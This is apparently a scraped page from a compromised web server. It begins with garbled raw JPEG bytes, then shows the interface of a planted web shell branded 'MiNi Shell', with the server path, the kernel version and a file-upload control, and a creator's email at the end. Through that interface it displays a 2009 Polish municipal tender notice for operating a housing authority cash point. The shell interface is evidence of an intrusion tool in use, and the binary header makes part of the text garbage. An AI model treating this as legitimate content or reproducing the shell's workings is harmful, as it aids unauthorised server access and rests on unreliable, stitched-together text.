JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090119/21127-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: prowadzenie punktu kasowego ZGM</b><br>
<b>Numer ogłoszenia: 21127 - 2009; data zamieszczenia: 19.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Wełniany Rynek 3, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7387101 (-02), faks 095 7387100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> prowadzenie punktu kasowego ZGM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług w zakresie prowadzenia punktu kasowego Zakładu Gospodarki Mieszkaniowej, polegających na:

a)	Przyjmowaniu wpłat gotówkowych od klientów w punkcie kasowym Zamawiającego zlokalizowanym przy ul. Armii Polskiej 29 w Gorzowie Wlkp. (najętym przez Wykonawcę) z tytułu czynszu od najemców lokali mieszkalnych, użytkowych, garaży, z tytułu dzierżawy, reklamy, a także innych wpłat będących należnościami Zamawiającego (np. odsetki od zaległości, koszty postępowania sądowego, rozliczenia zaliczki lub delegacji, wpłaty dotyczące schroniska itp.) Projekt umowy najmu stanowi załącznik nr 2 do niniejszej siwz.
b)	Przekazywanie środków pieniężnych z tytułu przyjętych wpłat gotówkowych na wskazane rachunki bankowe Zamawiającego, nie później niż w ciągu dwóch dni roboczych po ich przyjęciu w kasie.
c)	Za czynności wymienione w pkt. a - b Wykonawca nie będzie pobierał opłat i prowizji od wpłacających.
d)	W ramach przedmiotu zamówienia Wykonawca zagwarantuje zatrudnienie na warunkach nie pogorszonych personelu Zamawiającego zatrudnionego na stanowisku kasjerskim Zamawiającego zgodnie z art. 231 Kodeksu pracy - warunki zatrudnienia oraz wynagrodzenie personelu zawarte są w załączniku nr 3 do siwz,
e)	Wykonawca obowiązany będzie uruchomić obsługę kasową w przeciągu 3 tygodni od podpisania umowy. Zamawiający dopuszcza jeden dzień przerwy w obsłudze kasowej, związany z jej uruchomieniem.
f)	Wykonawca obowiązany będzie prowadzić punkt kasowy co najmniej w godzinach pracy zamawiającego zgodnie z projektem umowy o współpracy stanowiącej załącznik nr 4 do niniejszej siwz.
g)	Wykonawca poniesie wszelkie koszty związane z adaptacją i wyposażeniem punktu kasowego stosownie do swoich potrzeb, w tym m. in.  koszt przeszkolenia personelu, koszt i ryzyko związane z ubezpieczeniem i zabezpieczeniem gotówki przechowywanej w punkcie kasowym, koszt związany z konwojowaniem transportu wartości pieniężnych.
h)	Poza czynnościami opisanymi w pkt. 3 ust. 1 lit. a i b, Zamawiający dopuszcza świadczenie innych usług bankowych na zasadach przyjętych u Wykonawcy,
i)	Zamawiający umożliwi Wykonawcy zamontowanie szyldu na budynku, w którym mieści się siedziba ADM - 3

3.2. Zamawiający przewiduje możliwość zmian w treści umowy w następujących przypadkach:
c)	W przypadku zmian godzin pracy Zamawiającego, Wykonawca obowiązany będzie dostosować godziny obsługi klientów Punktu kasowego.
d)	Zmiana wynagrodzenia Wykonawcy możliwa będzie jedynie w przypadku ustawowej zmiany stawki podatku VAT.
e)	Zmiany numerów rachunków, o których mowa w § 2 ust. 4 umowy o współpracy.
f)	Zmiany lokalizacji punktu kasowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 3000,00 pln<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.	 nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 u Pzp
2. spełniają wymogi art. 22 ust. 1  u Pzp tj.:
2.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; tj. działają na podstawie ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 1997 r. nr 140 poz. 939 ze zm.) 
2.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
2.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
2.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia wymienionych wyżej warunków zostanie dokonana zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt. 10 niniejszej siwz. 

O ile nie zaistnieją okoliczności, które powodowałyby unieważnienie postępowania, to zamawiający na mocy art. 26 ust. 1 pkt. 3 i 4 u Pzp:
-w wyznaczonym przez siebie terminie wezwie wykonawców do uzupełnienia niezłożonych a wymaganych  dokumentów potwierdzających spełnienie warunków uczestnictwa w postępowaniu, dokumentów złożonych a zawierających błędy lub złożonych wadliwych pełnomocnictw,
-w wyznaczonym przez siebie terminie wezwie wykonawców do złożenia wyjaśnień dotyczących oświadczeń i dokumentów o których mowa w art. 25 ust. 1 u Pzp, potwierdzających spełnienie przez oferowane wyroby warunków określonych przez zamawiającego w siwz.
Złożone  na wezwanie zamawiającego oświadczenia i dokumenty winny potwierdzić spełnienie przez   wykonawcę warunków udziału  w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż  w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta  powinna zawierać następujące dokumenty i oświadczenia:
1.	wypełniony formularz oferty /zał. nr 1/wraz z  oświadczeniem, że: spełnia warunki określone w art. 22 ust. 1 u Pzp , zapoznał się z treścią załączonego wzoru umowy i akceptuje ją bez zastrzeżeń oraz zobowiązuje się w przypadku wyboru do jej zawarcia w miejscu i terminie wyznaczonym przez zamawiającego,
2.	zezwolenie Prezesa NBP lub inny dokument potwierdzający posiadanie uprawnień na wykonywanie  usług bankowych,
3.	aktualny (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej potwierdzające, że Wykonawca prowadzi działalność w zakresie wykonywania prac objętych zamówieniem oraz zawierający dane osób uprawnionych do reprezentowania Wykonawcy,
4.	aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5.	aktualnej informacji   z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.	aktualnej informacji   z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7.	kopia  aktualnego ubezpieczenia  OC w zakresie prowadzonej działalności; 
8.	oryginał pełnomocnictwa podpisany przez ustanowionych przedstawicieli Wykonawcy- dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólną ofertę (konsorcjum) 
Uwaga !
Wymagana jest forma pisemna a pełnomocnictwo winno określać rodzaj  czynności do których pełnomocnik jest umocowany do reprezentowania w przedmiotowym postępowaniu  (w szczególności do  podpisania oferty) albo do reprezentowania w przedmiotowym postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. 
9. zaakceptowany egzemplarz umowy,
10. pisemne zobowiązanie wykonawcy do przejęcia personelu, o którym mowa w pkt. 3.1. lit. e) siwz
11. dowód wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgm.bip.gorzow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZGM ul. Wełniany Rynek 3, 66-400 Gorzów Wlkp. pok. 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2009 godzina 12:00, miejsce: sekretariat ZGM, pok. 12.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com